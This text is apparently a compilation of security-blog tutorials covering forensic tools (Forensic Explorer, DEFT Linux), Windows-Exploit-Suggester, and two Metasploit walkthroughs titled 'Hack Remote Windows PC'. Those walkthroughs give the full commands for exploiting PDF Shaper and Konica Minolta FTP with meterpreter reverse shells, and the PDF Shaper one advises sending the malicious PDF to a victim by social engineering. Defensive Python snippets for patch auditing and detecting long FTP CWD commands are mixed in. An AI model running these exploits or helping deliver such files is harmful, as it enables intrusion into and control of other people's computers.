Forensic Investigation of RAW Image using Forensics Explorer (Part 1)

Forensic Explorer is a tool for the analysis of electronic evidence. Its primary users are law enforcement, corporate investigation agencies and law firms. Forensic Explorer has the features you expect from the very latest in forensic software. Bundled with Mount Image Pro, Forensic Explorer will quickly become an important part of your forensic software toolkit.

It enables investigators to:

· Manage the analysis of large volumes of information from multiple sources in a case file structure;
· Access and examine all available data, including hidden and system files, deleted files, file and disk slack and unallocated clusters;
· Automate complex investigation tasks;
· Produce detailed reports; and
· Provide non-forensic investigators a platform to easily review evidence.

Supported File Formats

Forensic Explorer supports the analysis of the following file formats:

· Apple DMG
· DD or RAW
· EnCase® (.E01, .L01, .Ex01)
· Forensic File Format (.AFF)
· FTK® (.E01, .AD1 formats)
· ISO (CD and DVD image files)
· Microsoft VHD
· NUIX File Safe (MFS01)
· ProDiscover®
· SMART®
· VMware®
· X-Ways (E01 and CTR)


First, download Forensic Explorer from here and install it on your PC. Then click on the New option.


Enter the case name and click on the New option in the Investigator tab.


In the next step, enter the investigator's full name, title, organization, department and email details, then click OK to proceed.


Select the cases folder where the forensic evidence will be created, and click OK.


Now click 'Add Image'.


Now select the path of the RAW image. To create a RAW image, follow the link below:

http://www.hackingarticles.in/how-to-create-copy-of-suspects-evidence-using-ftk-imager/


Now select the tasks to be processed on the RAW image from the given list and click on Start.


After the process completes, it shows the results for all the tasks selected earlier.


Now click on File System. The File System module is the primary Forensic Explorer window, where actions such as highlighting, selecting, sorting, filtering, flagging, exporting and opening take place.


Select Registry analysis: open and examine Windows registry hives. Filter, categorize and keyword-search registry keys. Automate registry analysis with RegEx scripts.


Bookmark selection enables almost any item (e.g. file, folder, keyword, search hit, etc.), or a selection from an item (e.g. a fragment of text from a file or unallocated clusters), to be bookmarked and listed in the Bookmarks module. 


Reports: The purpose of the Reports Module is to assist in the generation of a report that documents the forensic analysis. The Reports module is based on the use of templates that can be re-used across multiple investigations.

How to Show all Possible Exploits in Victim PC using Windows-Exploit-Suggester

This tool compares a target's patch level against the Microsoft vulnerability database in order to detect potentially missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.

It requires the 'systeminfo' command output from a Windows host in order to compare it against the Microsoft security bulletin database and determine the patch level of the host.

It has the ability to automatically download the security bulletin database from Microsoft with the --update flag, and saves it as an Excel spreadsheet.


First, download Windows-Exploit-Suggester from here and unzip it on your PC.


Now update the bulletin database using:
./windows-exploit-suggester.py --update


Now download xlrd-0.9.4 from here (it is a prerequisite) and install it on your PC using:

./setup.py install


Now run the systeminfo command in a Windows command prompt and save the output on the Desktop as
Win7-ultimate.txt.


Now copy the file Win7-ultimate.txt into the Windows-Exploit-Suggester-master folder on Kali Linux, as shown below.


Now run the following command and you will get the result:

./windows-exploit-suggester.py --database 2015-09-25-mssb.xlsx --systeminfo win7-ultimate-systeminfo.txt

It now lists all possible exploits for the victim's Windows operating system.
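The core of what the tool does is a patch audit: parse the systeminfo output for the OS name and installed hotfixes, then diff them against a required-patch baseline. The following is an added example (not the tool's own code) that shows that comparison from a defender's patch-compliance view; the systeminfo text and the required-KB baseline are constructed, whereas the real tool loads the Microsoft bulletin spreadsheet downloaded with --update.

```python
import re

# Constructed, abridged `systeminfo` output; not captured from a real host.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WIN7-ULTIMATE
OS Name:                   Microsoft Windows 7 Ultimate
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2533552
                           [02]: KB3000061
                           [03]: KB3079904
"""

# Constructed patch baseline keyed by OS name (assumption for this example);
# an actual audit would derive the required KBs from the bulletin database.
REQUIRED_KBS = {
    "Microsoft Windows 7 Ultimate": {
        "KB2533552", "KB3000061", "KB3079904", "KB3087088",
    },
}

def parse_systeminfo(text):
    """Return (os_name, os_version, installed_kbs) from systeminfo output."""
    os_name = os_version = None
    for line in text.splitlines():
        if line.startswith("OS Name:"):
            os_name = line.split(":", 1)[1].strip()
        elif line.startswith("OS Version:"):
            os_version = line.split(":", 1)[1].strip()
    # Hotfix entries look like "[01]: KB2533552"; collect every KB token.
    installed = set(re.findall(r"\bKB\d{6,7}\b", text))
    return os_name, os_version, installed

def missing_patches(text, baseline=REQUIRED_KBS):
    """Return the sorted list of required KBs that the host has not installed."""
    os_name, _, installed = parse_systeminfo(text)
    required = baseline.get(os_name)
    if required is None:
        raise ValueError(f"no patch baseline for OS {os_name!r}")
    return sorted(required - installed)

if __name__ == "__main__":
    print(missing_patches(SAMPLE_SYSTEMINFO))   # ['KB3087088']
```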


Forensic Investigation Tutorial Using DEFT

DEFT (acronym for Digital Evidence & Forensics Toolkit) is a distribution made for Computer Forensics, with the purpose of running live on systems without tampering or corrupting devices (hard disks, pen drives, etc…) connected to the PC where the boot process takes place.

The DEFT system is based on GNU/Linux; it can run live (via DVD-ROM or USB pen drive), be installed, or run as a virtual appliance on VMware or VirtualBox. DEFT employs LXDE as its desktop environment and WINE for executing Windows tools under Linux. It features a comfortable mount manager for device management.

First, download the ISO image of DEFT Linux from here.


After the DEFT boot loader has started, you will see a screen with several boot options. Now click on Install DEFT Linux 8.


Now click on Continue.


Now select the third-party software option and click on Continue.


Now it will ask for the option to install Kubuntu.
Select Guided - use entire disk and click on Install Now.


Now select your time zone and click OK.


Now fill in your personal details and select Continue. Click on Restart Now.



· Analysis - tools for analysing files of different types.
· Antimalware - search for rootkits, viruses, malware and malicious PDFs.
· Data Recovery - file recovery software.
· Hashing - scripts for calculating hashes (SHA1, SHA256, MD5, ...) of files and other artefacts.
· Imaging - applications for cloning and imaging hard drives or other sources.
· Mobile Forensics - analysis of BlackBerry, Android and iPhone devices, as well as the SQLite databases typically used by mobile applications.
· Network Forensics - tools for processing information captured from the network.
· OSINT - applications that facilitate obtaining information associated with users and their activity.
· Password recovery - recovery of BIOS passwords and passwords of compressed files and Office documents, brute force, etc.
· Reporting tools - finally, within this section you will find tools that facilitate the task of reporting and documenting the evidence produced by the forensic work: screen capture, note collection, desktop activity log, etc.


Hack Remote Windows PC using PDF Shaper Buffer Overflow

PDF Shaper is prone to a buffer overflow vulnerability when processing PDF files. The vulnerability is triggered when the Convert PDF to Image feature is used on a specially crafted PDF file. This Metasploit module has been tested successfully on Windows XP, Windows 7, Windows 8 and Windows 10.

Exploit Targets
PDF Shaper

Requirement
Attacker: Kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole


Now type use exploit/windows/fileformat/pdf_shaper_bof
msf exploit (pdf_shaper_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (pdf_shaper_bof)>set lhost 192.168.1.16 (IP of Local Host)
msf exploit (pdf_shaper_bof)>exploit  


After the malicious PDF file has been generated successfully, it is stored on your local computer at
/root/.msf4/local/msf.pdf


Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.16
exploit

Now send your msf.pdf file to the victim using any social engineering technique. When the victim uses the PDF Shaper tool and clicks on the PDF to Image option,


it shows the Add File option; the victim selects msf.pdf and clicks on Convert.


Now you will get the meterpreter session of the victim PC.

Hack Remote Windows PC using Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow

This module exploits an SEH overflow in Konica Minolta FTP Server 1.00. Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which leads to an SEH overflow. Konica FTP allows anonymous access by default; valid credentials are typically unnecessary to exploit this vulnerability.

Exploit Targets
Konica Minolta FTP Server 1.00

Requirement
Attacker: Kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole


Now type use exploit/windows/ftp/kmftp_utility_cwd
msf exploit (kmftp_utility_cwd)>set payload windows/meterpreter/reverse_tcp
msf exploit (kmftp_utility_cwd)>set lhost 192.168.1.5 (IP of Local Host)
msf exploit (kmftp_utility_cwd)>set rhost 192.168.1.7
msf exploit (kmftp_utility_cwd)>set FTPUSER anonymous
msf exploit (kmftp_utility_cwd)>set FTPPASS raj
msf exploit (kmftp_utility_cwd)>exploit
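Because the flaw described above is an unchecked argument length on the CWD command over a service that accepts anonymous logins, the defender-side signal is simple to describe: a CWD argument far longer than any real path, ideally correlated with an anonymous session. The following is an added example (not part of the original post or the Metasploit module) of that detection over constructed FTP control-channel log lines; the log format, the 255-byte threshold and the alert fields are assumptions for this example.

```python
import re

# Constructed FTP control-channel log lines (not a real capture). Assumed format:
# "<timestamp> <client_ip> <command> [argument]"
SAMPLE_FTP_LOG = """\
2015-09-25T10:01:02 192.168.1.5 USER anonymous
2015-09-25T10:01:02 192.168.1.5 PASS raj
2015-09-25T10:01:03 192.168.1.5 CWD /pub
2015-09-25T10:01:09 192.168.1.5 CWD """ + "A" * 600 + """
2015-09-25T10:02:11 192.168.1.9 USER backup
2015-09-25T10:02:12 192.168.1.9 CWD /srv/scans
"""

# Assumed sane upper bound for a directory path on this server; tune per environment.
MAX_CWD_LEN = 255

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+)(?: (.*))?$")

def detect_long_cwd(log_text, max_len=MAX_CWD_LEN):
    """Return one alert per CWD whose argument exceeds max_len.

    Each alert records the client, the argument length and whether that
    client had earlier logged in as 'anonymous' in the same log.
    """
    anonymous_clients = set()
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # skip lines that do not fit the format
        ts, client, cmd, arg = m.groups()
        arg = arg or ""
        cmd = cmd.upper()
        if cmd == "USER" and arg.lower() == "anonymous":
            anonymous_clients.add(client)
        elif cmd == "CWD" and len(arg) > max_len:
            alerts.append({
                "time": ts,
                "client": client,
                "arg_len": len(arg),
                "anonymous": client in anonymous_clients,
            })
    return alerts

if __name__ == "__main__":
    for alert in detect_long_cwd(SAMPLE_FTP_LOG):
        print(alert)
```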